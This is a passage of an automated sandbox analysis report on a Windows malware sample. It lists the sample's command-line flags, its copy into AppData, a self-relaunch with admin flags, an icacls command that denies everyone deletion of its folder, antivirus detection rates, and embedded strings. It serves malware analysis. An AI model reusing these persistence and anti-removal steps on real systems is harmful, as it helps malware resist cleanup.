              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsTask2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Task2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --AutoStart2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Service2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Admin2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: C:\Windows\2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: D:\Windows\2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: %username%2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: F:\2_2_00F29F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Admin3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsAutoStart3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsTask3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --ForNetRes3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsAutoStart3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsTask3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Task3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --AutoStart3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Service3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Admin3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: C:\Windows\3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: D:\Windows\3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: %username%3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: F:\3_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Admin4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsAutoStart4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsTask4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --ForNetRes4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsAutoStart4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsTask4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Task4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --AutoStart4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Service4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Admin4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: C:\Windows\4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: D:\Windows\4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: %username%4_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: F:\4_2_00F19F90
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeReversingLabs: Detection: 86%
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeVirustotal: Detection: 78%
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeString found in binary or memory: set-addPolicy
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeString found in binary or memory: setct-CertReqTBEXsetct-CertResTBEsetct-CRLNotificationTBSsetct-CRLNotificationResTBSsetct-BCIDistributionTBSsetext-genCryptgeneric cryptogramsetext-miAuthmerchant initiated authsetext-pinSecuresetext-pinAnysetext-track2setext-cvadditional verificationset-policy-rootsetCext-hashedRootsetCext-certTypesetCext-merchDatasetCext-cCertRequiredsetCext-tunnelingsetCext-setExtsetCext-setQualfsetCext-PGWYcapabilitiessetCext-TokenIdentifiersetCext-Track2DatasetCext-TokenTypesetCext-IssuerCapabilitiessetAttr-CertsetAttr-PGWYcappayment gateway capabilitiessetAttr-TokenTypesetAttr-IssCapissuer capabilitiesset-rootKeyThumbset-addPolicysetAttr-Token-EMVsetAttr-Token-B0PrimesetAttr-IssCap-CVMsetAttr-IssCap-T2setAttr-IssCap-SigsetAttr-GenCryptgrmgenerate cryptogramsetAttr-T2Encencrypted track 2setAttr-T2cleartxtcleartext track 2setAttr-TokICCsigICC or token signaturesetAttr-SecDevSigsecure device signatureset-brand-IATA-ATAset-brand-Dinersset-brand-AmericanExpressset-brand-JCBset-brand-Visaset-brand-MasterCardset-brand-NovusDES-CDMFdes-cdmfrsaOAEPEncryptionSETITU-Titu-tJOINT-ISO-ITU-Tjoint-iso-itu-tinternational-organizationsInternational OrganizationsmsSmartcardLoginMicrosoft SmartcardloginmsUPNMicrosoft Universal Principal NameAES-128-CFB1aes-128-cfb1AES-192-CFB1aes-192-cfb1AES-256-CFB1aes-256-cfb1AES-128-CFB8aes-128-cfb8AES-192-CFB8aes-192-cfb8AES-256-CFB8aes-256-cfb8DES-CFB1des-cfb1DES-CFB8des-cfb8DES-EDE3-CFB1des-ede3-cfb1DES-EDE3-CFB8des-ede3-cfb8streetstreetAddresspostalCodeid-pplproxyCertInfoProxy Certificate Informationid-ppl-anyLanguageAny languageid-ppl-inheritAllInherit allnameConstraintsX509v3 Name Constraintsid-ppl-independentIndependentRSA-SHA256sha256WithRSAEncryptionRSA-SHA384sha384WithRSAEncryptionRSA-SHA512sha512WithRSAEncryptionRSA-SHA224sha224WithRSAEncryptionSHA256sha256SHA384sha384SHA512sha512SHA224sha224identified-organizationcerticom-arcwapwap-wsgid-characteristic-two-basisonBasistpBasisppBasisc2pnb163v1c2pnb163v2c2pnb163v3c2pnb176v1c2tnb191v1c2tnb191v2c2tnb191v3c2onb191v4c2onb191v5c2pnb208w1c2tnb239v1c2tnb239v2c2tnb239v3c2onb239v4c2onb239v5c2pnb272w1c2pnb304w1c2tnb359v1c2pnb368w1c2tnb431r1secp112r1secp112r2*
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeString found in binary or memory: id-cmc-addExtensions
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile read: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673" /deny *S-1-1-0:(OI)(CI)(DE,DC)
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeProcess created: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe "C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --Admin IsNotAutoStart IsNotTask
              Source: unknownProcess created: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe --Task
              Source: unknownProcess created: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe "C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --AutoStart
              Source: unknownProcess created: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe "C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --AutoStart
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeProcess created: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe "C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic file information: File size 1150976 > 1048576
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\i source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.000000000393D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\001\* source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1923906292.0000000003366000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\input\fr-029\d.pdb\C source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242440912.000000000380F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242013730.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2243247829.0000000003813000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242219779.0000000003807000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284691080.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285082947.0000000003395000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283843769.0000000003366000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2286049396.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2286088788.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2221073589.000000000394A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\k source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1960744215.0000000003391000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242821627.0000000003B6A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253587616.0000000003B4B000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253827941.0000000003B5B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\l\\m source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219677966.000000000339D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219600233.000000000337F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220925314.00000000033AB000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219724581.00000000033A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\**KS source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2221019440.000000000395A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\c source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.000000000393D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290353471.0000000003C82000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\L source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299664958.0000000003C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\k source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303833195.0000000003D57000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299751780.0000000003D57000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\" source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2262926457.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261615896.0000000003B92000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303180296.0000000003B63000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303090590.0000000003B33000.00000004.00000020.00020000.00000000.sdmp
